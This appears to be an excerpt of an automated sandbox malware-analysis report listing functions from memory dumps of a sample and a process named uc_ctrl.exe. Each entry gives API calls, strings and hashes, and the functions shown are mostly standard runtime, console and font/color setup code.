String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2264918676-1866435925
Opcode ID: af54d455a0a5f7eaa8b1cb1a772185de0ab4e001b871b1f9c37b12cf524af2a3
Instruction ID: eff87254843dd9c6f00d8dff07c864234719fcaf6c66f6ad46ff64576f43087d
Opcode Fuzzy Hash: af54d455a0a5f7eaa8b1cb1a772185de0ab4e001b871b1f9c37b12cf524af2a3
Instruction Fuzzy Hash: E111C472210A0C89EF96CB18C4813D97361F748BD9F548512EE9E876A4DF38CB4AC340

Function 0000000180007518 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 000000018000759B

Strings

ios_base::badbit set, xrefs: 0000000180007563
ios_base::eofbit set, xrefs: 0000000180007576
ios_base::failbit set, xrefs: 000000018000756F

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2264918676-1866435925
Opcode ID: 9ade0c42704697c465d9ea59b767c1e10a1e5861e28d3d181a600163cc02292a
Instruction ID: ee344a89a6d366079b0237149d86ae6f2483ad1a2cdeae8bee14aec7460c9589
Opcode Fuzzy Hash: 9ade0c42704697c465d9ea59b767c1e10a1e5861e28d3d181a600163cc02292a
Instruction Fuzzy Hash: 02016172B1190C46EF9AD715D8623E92320F758BC6F898416E64E47696DF6CC249C300

Function 0000000180007428 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 29COMMON

Download Yara Rule

APIs

std::ios_base::failure::failure.LIBCPMT ref: 000000018000747C

Strings

ios_base::badbit set, xrefs: 0000000180007444
ios_base::eofbit set, xrefs: 0000000180007457
ios_base::failbit set, xrefs: 0000000180007450

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::ios_base::failure::failure
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2264918676-1866435925
Opcode ID: 046f3e442affa3144d8814327d0acf6b750df78a92ebb724f4cffc6ed004799c
Instruction ID: 0fbc0c36cb7cee4bf38b0d6db9d5b3b87bd3bef84cd284e63da7b638a8121b1b
Opcode Fuzzy Hash: 046f3e442affa3144d8814327d0acf6b750df78a92ebb724f4cffc6ed004799c
Instruction Fuzzy Hash: 46F0CD72A1190CA9EA92D700E4923DA2321F7A83C4FC8C012B64D076A6EF2CC74EC741

Function 0000000180021848 Relevance: 6.3, APIs: 4, Instructions: 305fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000001800218CF
WriteFile.KERNEL32 ref: 0000000180021B96
WriteFile.KERNEL32 ref: 0000000180021BDF
GetLastError.KERNEL32 ref: 0000000180021CA0

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: bc5653116b66ff5ce1a01aad2c0c5e47b9cb5d0ce7c6b2c8de21f10310bed07c
Instruction ID: eb648fbc8301a7662f21a79842005968ebf4d6908eac293b07af179ab9618b06
Opcode Fuzzy Hash: bc5653116b66ff5ce1a01aad2c0c5e47b9cb5d0ce7c6b2c8de21f10310bed07c
Instruction Fuzzy Hash: 83D1AA32B04A888AE793CF79E4403DC37B1E759BD9F148212EE5997B99DE34C64AC740

Function 0000000180022224 Relevance: 6.2, APIs: 4, Instructions: 218COMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleMode.KERNEL32 ref: 0000000180022347
GetLastError.KERNEL32 ref: 00000001800223D1

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 4d73d6813b56a2dc7752c7ceea4df9d00f87906dfa32c6e6a0e08043a835bd66
Instruction ID: 371f0744e8b77a04521c2075c780a02dc2cd061dbaba1a9c0a0a0efcc394c5a4
Opcode Fuzzy Hash: 4d73d6813b56a2dc7752c7ceea4df9d00f87906dfa32c6e6a0e08043a835bd66
Instruction Fuzzy Hash: 1291C272710A58A9FB93DBA5A4847ED27A0F34CBD8F448106FE1A57A95CF34C68AC710

Function 000000018002D028 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018002D069
_invalid_parameter_noinfo.LIBCMT ref: 000000018002D0E9
_invalid_parameter_noinfo.LIBCMT ref: 000000018002D13D
_get_daylight.LIBCMT ref: 000000018002D195

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_get_daylight
String ID:
API String ID: 72036449-0
Opcode ID: 1575dfa55e85cd9e65b028130c7e3fe67857dc51b1bfb061f51b9401c4ef2222
Instruction ID: cb74ac6465134be6521e7c1865078a54590a4d88dac67272f0bbca9d60b1cbe9
Opcode Fuzzy Hash: 1575dfa55e85cd9e65b028130c7e3fe67857dc51b1bfb061f51b9401c4ef2222
Instruction Fuzzy Hash: BA51FF3260464C92F7FB5A2899053EA6790E34C794F19C02BFA0547AE6CEB8CF58C342

Function 00000001800144C4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00000001800144EE

Strings

csm, xrefs: 0000000180014513
csm, xrefs: 0000000180014682

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: daf33ebf70fac00cd51946a5845d4bb8b15e34f52b79b69f7a048caa6e5e73f2
Instruction ID: b0cefe1ccb1630ed2818d411a412925ef1adc199ee0d369432af14a5c12a6445
Opcode Fuzzy Hash: daf33ebf70fac00cd51946a5845d4bb8b15e34f52b79b69f7a048caa6e5e73f2
Instruction Fuzzy Hash: 1671A273105AC4C6DBA28F25E0507ADBBA1F349BD9F14C115FA884BB99CF38C699C701

Function 0000000180014B58 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000000180014C02
_CreateFrameInfo.LIBVCRUNTIME ref: 0000000180014C2E

Strings

csm, xrefs: 0000000180014D2E

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: 832b8a7e18f91d038939eb56d0b98e7c8df3d74096dc22160cb54cc61af829fc
Instruction ID: 0c3a864f7ac2bccdb0798f13c2bdfd845ad7f9387c1f39ad3e97f6ae7e3ce330
Opcode Fuzzy Hash: 832b8a7e18f91d038939eb56d0b98e7c8df3d74096dc22160cb54cc61af829fc
Instruction Fuzzy Hash: 7F511777215B4886E7A1AB26E44039E77A4F388BE1F148215EB890BB95DF38C565CB40

Function 0000000180021EF4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000000018002200B
GetLastError.KERNEL32 ref: 000000018002202D

Strings

U, xrefs: 0000000180021FB7

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 804990de3a596e42ffc9c94123fb8a2941867c91bfdac02688906d2080c89bb6
Instruction ID: fc3bd1c6fdb1bc1e6fc11558a99dd9ff81473f8586d02bbccffa04c43881791f
Opcode Fuzzy Hash: 804990de3a596e42ffc9c94123fb8a2941867c91bfdac02688906d2080c89bb6
Instruction Fuzzy Hash: 4341AD72314A8896EBA29F65E4443EA67A0F79C7D4F418122FE4D87798DF38C649CB40

Function 000000018000339C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 0000000180003430
__std_exception_copy.LIBVCRUNTIME ref: 00000001800034D0

Strings

ios_base::failbit set, xrefs: 000000018000339E

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: __std_exception_copy
String ID: ios_base::failbit set
API String ID: 592178966-3924258884
Opcode ID: 1adf97d368a9e1eaca2f45c68a279e6a390c49f26f808adde1a9b7a1ef994268
Instruction ID: 5c4a858921b8105bfa3d16116ec334abc67fd5708029537132ece9c0ffd2f25a
Opcode Fuzzy Hash: 1adf97d368a9e1eaca2f45c68a279e6a390c49f26f808adde1a9b7a1ef994268
Instruction Fuzzy Hash: 92416B72A00B4888EB428B65D8813EC3375E75DBD8F54C222EE5C1A695EF78D2D8C340

Function 00000001800113A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00000001800113E4
RaiseException.KERNEL32 ref: 000000018001142A

Strings

csm, xrefs: 0000000180011417

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 5ab760f4b8642cb22ab3ad06f967efcbb32453ea5721cc2fc6fb6f82203d7441
Instruction ID: 729e5110003d2cd851bab667c3b845576cebdbea50ce3f037de003a935eff5a6
Opcode Fuzzy Hash: 5ab760f4b8642cb22ab3ad06f967efcbb32453ea5721cc2fc6fb6f82203d7441
Instruction Fuzzy Hash: 03112B36214B4886EB568F15F44039A77A1F78CBC5F588225EE8C07B58DF38C6568B00

Function 0000000180003324 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 000000018000333B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 000000018000337A

Part of subcall function 000000018000EA14: _Yarn.LIBCPMT ref: 000000018000EA42

Strings

bad locale name, xrefs: 000000018000338E

Memory Dump Source

Source File: 00000000.00000002.2318744458.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.2318638448.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_KLL.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_Yarn
String ID: bad locale name
API String ID: 1838369231-1405518554
Opcode ID: 8eac1968ee0be17b5f912b2346201a8a557ab973e214a5d3253b652d70e68ed0
Instruction ID: 3d425af4a9c7b5c8793bbaa9f00958bb0e83af226d822cadf0bb223c79b2c5ac
Opcode Fuzzy Hash: 8eac1968ee0be17b5f912b2346201a8a557ab973e214a5d3253b652d70e68ed0
Instruction Fuzzy Hash: 89018F32101BC48AC396DF75A88039977A5F71DB84F189128AA8C8370AEF34C694C340

Analysis Process: uc_ctrl.exePID: 7340, Parent PID: 7292COMMON

Executed Functions

Function 6CB219CE Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6CB1B8C3,?,00000003,?,00000004), ref: 6CB219E0
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 6CB219F0
EncodePointer.KERNEL32(00000000,?,6CB1B8C3,?,00000003,?,00000004), ref: 6CB219F9
DecodePointer.KERNEL32(C375B885,?,?,6CB1B8C3,?,00000003,?,00000004), ref: 6CB21A07
GetLocaleInfoEx.KERNEL32(00000004,?,00000003,?,?,6CB1B8C3,?,00000003,?,00000004), ref: 6CB21A26
GetLocaleInfoW.KERNEL32(00000000,?,00000003,?,?,6CB1B8C3,?,00000003,?,00000004), ref: 6CB21A3D

Strings

kernel32.dll, xrefs: 6CB219DB
GetLocaleInfoEx, xrefs: 6CB219EA

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: InfoLocalePointer$AddressDecodeEncodeHandleModuleProc
String ID: GetLocaleInfoEx$kernel32.dll
API String ID: 3226634038-1547310189
Opcode ID: f4fe1788fa358328ef4550facbf86d1d68fd6faa1c3da2235230ec05cf4bf85e
Instruction ID: d5e183e450655e77f065ddb13b90b55a53494642895c1484cc004a39aee6a00d
Opcode Fuzzy Hash: f4fe1788fa358328ef4550facbf86d1d68fd6faa1c3da2235230ec05cf4bf85e
Instruction Fuzzy Hash: DD011232612255BF9F015FA4DC088AF3F79EF0B6557084414FD2997610EB36C9219BA1

Function 6CB00090 Relevance: 9.5, APIs: 3, Strings: 2, Instructions: 790COMMON

Download Yara Rule

Strings

fer, xrefs: 6CB0048B
P, xrefs: 6CB000B6

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID:
String ID: P$fer
API String ID: 0-1002059999
Opcode ID: d4747a243fc1df083f47949f6eba9987fdfe58231b5c1821b9c91872f6362dcf
Instruction ID: 883b56722fac8a16096e1adbd38641ba0e2ff63d553cf7e63de4d36b83e7a1d8
Opcode Fuzzy Hash: d4747a243fc1df083f47949f6eba9987fdfe58231b5c1821b9c91872f6362dcf
Instruction Fuzzy Hash: 82821574E042A9CFDB14CF98D890BADBBB2FF48309F248199D409AB755D730AA81CF51

Function 6CB4FEA4 Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 373stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB4FEAE

Part of subcall function 6CB2512A: __EH_prolog3.LIBCMT ref: 6CB25131
Part of subcall function 6CB2512A: GetWindowDC.USER32(00000000,00000004,6CB50443,00000000), ref: 6CB2515D

GetDeviceCaps.GDI32(?,00000058), ref: 6CB4FECE
DeleteObject.GDI32(00000000), ref: 6CB4FF38
DeleteObject.GDI32(00000000), ref: 6CB4FF56
DeleteObject.GDI32(00000000), ref: 6CB4FF74
DeleteObject.GDI32(00000000), ref: 6CB4FF92
DeleteObject.GDI32(00000000), ref: 6CB4FFB0
DeleteObject.GDI32(00000000), ref: 6CB4FFCE
DeleteObject.GDI32(00000000), ref: 6CB4FFEC
DeleteObject.GDI32(00000000), ref: 6CB5000A
DeleteObject.GDI32(00000000), ref: 6CB50028
DeleteObject.GDI32(00000000), ref: 6CB50046
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 6CB5007E
lstrcpyW.KERNEL32(?,?), ref: 6CB500CE
EnumFontFamiliesW.GDI32(?,00000000,6CB4F840,Segoe UI), ref: 6CB500F5
lstrcpyW.KERNEL32(?,Segoe UI), ref: 6CB50108
EnumFontFamiliesW.GDI32(?,00000000,6CB4F840,Tahoma), ref: 6CB50126
lstrcpyW.KERNEL32(?,MS Sans Serif), ref: 6CB50140
CreateFontIndirectW.GDI32(?), ref: 6CB5014A
CreateFontIndirectW.GDI32(?), ref: 6CB5019B
CreateFontIndirectW.GDI32(?), ref: 6CB501DA
CreateFontIndirectW.GDI32(?), ref: 6CB50206
CreateFontIndirectW.GDI32(?), ref: 6CB50227
GetSystemMetrics.USER32(00000048), ref: 6CB50246
lstrcpyW.KERNEL32(?,Marlett), ref: 6CB50259
CreateFontIndirectW.GDI32(?), ref: 6CB50263
GetStockObject.GDI32(00000011), ref: 6CB5028F
GetObjectW.GDI32(00000000,0000005C,?), ref: 6CB502A6
lstrcpyW.KERNEL32(?,Arial), ref: 6CB502E3
CreateFontIndirectW.GDI32(?), ref: 6CB502ED
CreateFontIndirectW.GDI32(?), ref: 6CB50306
GetStockObject.GDI32(00000011), ref: 6CB5031A
GetObjectW.GDI32(?,0000005C,?), ref: 6CB5032F
CreateFontIndirectW.GDI32(?), ref: 6CB5033D
CreateFontIndirectW.GDI32(?), ref: 6CB5035E

Part of subcall function 6CB507FA: __EH_prolog3_GS.LIBCMT ref: 6CB50801
Part of subcall function 6CB507FA: GetTextMetricsW.GDI32(?,?), ref: 6CB50837
Part of subcall function 6CB507FA: GetTextMetricsW.GDI32(?,?), ref: 6CB50878

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

Strings

MS Sans Serif, xrefs: 6CB5013A
Segoe UI, xrefs: 6CB500E3, 6CB500FF
Arial, xrefs: 6CB502D3
Marlett, xrefs: 6CB50253
Tahoma, xrefs: 6CB50114, 6CB50133

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$lstrcpy$MetricsText$EnumFamiliesH_prolog3_Stock$CapsCharsetDeviceException@8H_prolog3InfoSystemThrowWindow
String ID: Arial$MS Sans Serif$Marlett$Segoe UI$Tahoma
API String ID: 3209990573-1395034203
Opcode ID: 5ee3f3ef74c0529e870a7e58a8be16ccb85679ecbe9bd5d7a75142f98f073697
Instruction ID: 8337fe6a4ed746106689602960b65588e34c2e29e276e101fb97450cc1ee3918
Opcode Fuzzy Hash: 5ee3f3ef74c0529e870a7e58a8be16ccb85679ecbe9bd5d7a75142f98f073697
Instruction Fuzzy Hash: D5E18FB0A013899BDF119FB0C84CBDFBBB8AF06309F044499E55AEB694EB349549CF15

Function 6CB503DD Relevance: 64.8, APIs: 43, Instructions: 297COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB503E4
GetSysColor.USER32(00000016), ref: 6CB503ED
GetSysColor.USER32(0000000F), ref: 6CB50400
GetSysColor.USER32(00000015), ref: 6CB50417
GetSysColor.USER32(0000000F), ref: 6CB50423
GetDeviceCaps.GDI32(?,0000000C), ref: 6CB5044B
GetSysColor.USER32(0000000F), ref: 6CB50459
GetSysColor.USER32(00000010), ref: 6CB50467
GetSysColor.USER32(00000015), ref: 6CB50475
GetSysColor.USER32(00000016), ref: 6CB50483
GetSysColor.USER32(00000014), ref: 6CB50491
GetSysColor.USER32(00000012), ref: 6CB5049F
GetSysColor.USER32(00000011), ref: 6CB504AD
GetSysColor.USER32(00000006), ref: 6CB504B8
GetSysColor.USER32(0000000D), ref: 6CB504C3
GetSysColor.USER32(0000000E), ref: 6CB504CE
GetSysColor.USER32(00000005), ref: 6CB504D9
GetSysColor.USER32(00000008), ref: 6CB504E7
GetSysColor.USER32(00000009), ref: 6CB504F2
GetSysColor.USER32(00000007), ref: 6CB504FD
GetSysColor.USER32(00000002), ref: 6CB50508
GetSysColor.USER32(00000003), ref: 6CB50513
GetSysColor.USER32(0000001B), ref: 6CB50521
GetSysColor.USER32(0000001C), ref: 6CB5052F
GetSysColor.USER32(0000000A), ref: 6CB5053D
GetSysColor.USER32(0000000B), ref: 6CB5054B
GetSysColor.USER32(00000013), ref: 6CB50559
GetSysColor.USER32(0000001A), ref: 6CB5057A
GetSysColorBrush.USER32(00000010), ref: 6CB50593
GetSysColorBrush.USER32(00000014), ref: 6CB505A7
GetSysColorBrush.USER32(00000005), ref: 6CB505B6
CreateSolidBrush.GDI32(?), ref: 6CB505D3
CreateSolidBrush.GDI32(?), ref: 6CB505F1
CreateSolidBrush.GDI32(?), ref: 6CB5060F
CreateSolidBrush.GDI32(?), ref: 6CB50630
CreateSolidBrush.GDI32(?), ref: 6CB5064E
CreateSolidBrush.GDI32(?), ref: 6CB5066C
CreateSolidBrush.GDI32(?), ref: 6CB5068A
CreatePen.GDI32(00000000,00000001,00000000), ref: 6CB506AE
CreatePen.GDI32(00000000,00000001,00000000), ref: 6CB506D2
CreatePen.GDI32(00000000,00000001,00000000), ref: 6CB506F6
CreateSolidBrush.GDI32(?), ref: 6CB5077E
CreatePatternBrush.GDI32(00000000), ref: 6CB507C0

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Color$BrushCreate$Solid$CapsDeviceH_prolog3Pattern
String ID:
API String ID: 3832706086-0
Opcode ID: d8f28bf07db97c1201e9c807e8bf9990a30098764f43750feb27e4241f7f2be6
Instruction ID: d591bbbaff14622171f32f51a4f6dee86f3d4f788cca282ecd36a7797b602609
Opcode Fuzzy Hash: d8f28bf07db97c1201e9c807e8bf9990a30098764f43750feb27e4241f7f2be6
Instruction Fuzzy Hash: A0C190B0B02692BFDB059FB489087ADFF70BF0A705F445119E605D7A84DB34E528DB94

Function 00C68832 Relevance: 19.6, APIs: 13, Instructions: 104COMMON

Download Yara Rule

APIs

_initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(00C6A674,00C6A684,00C6C488,00000014), ref: 00C68883
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(00C6A658,00C6A670,00C6C488,00000014), ref: 00C688A9
___scrt_release_startup_lock.LIBCMT ref: 00C688C4
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00C688D8
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00C688FE
_register_thread_local_exe_atexit_callback.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00C6C488,00000014), ref: 00C6890A
___scrt_get_show_window_mode.LIBCMT ref: 00C68910
_get_wide_winmain_command_line.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00C6C488,00000014), ref: 00C68919
_cexit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00C6C488,00000014), ref: 00C68939
___scrt_uninitialize_crt.LIBCMT ref: 00C68941
___scrt_fastfail.LIBCMT ref: 00C68990
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000007,00C6C488,00000014), ref: 00C68996
_exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000007,00C6C488,00000014), ref: 00C6899E

Memory Dump Source

Source File: 00000013.00000002.4020506239.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000013.00000002.4020404137.0000000000C60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.4020635619.0000000000C6A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.4020785454.0000000000C71000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.4020855893.0000000000C72000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_c60000_uc_ctrl.jbxd

Similarity

API ID: ___scrt_is_nonwritable_in_current_image$___scrt_fastfail___scrt_get_show_window_mode___scrt_release_startup_lock___scrt_uninitialize_crt_cexit_exit_get_wide_winmain_command_line_initterm_initterm_e_register_thread_local_exe_atexit_callbackexit
String ID:
API String ID: 2427040849-0
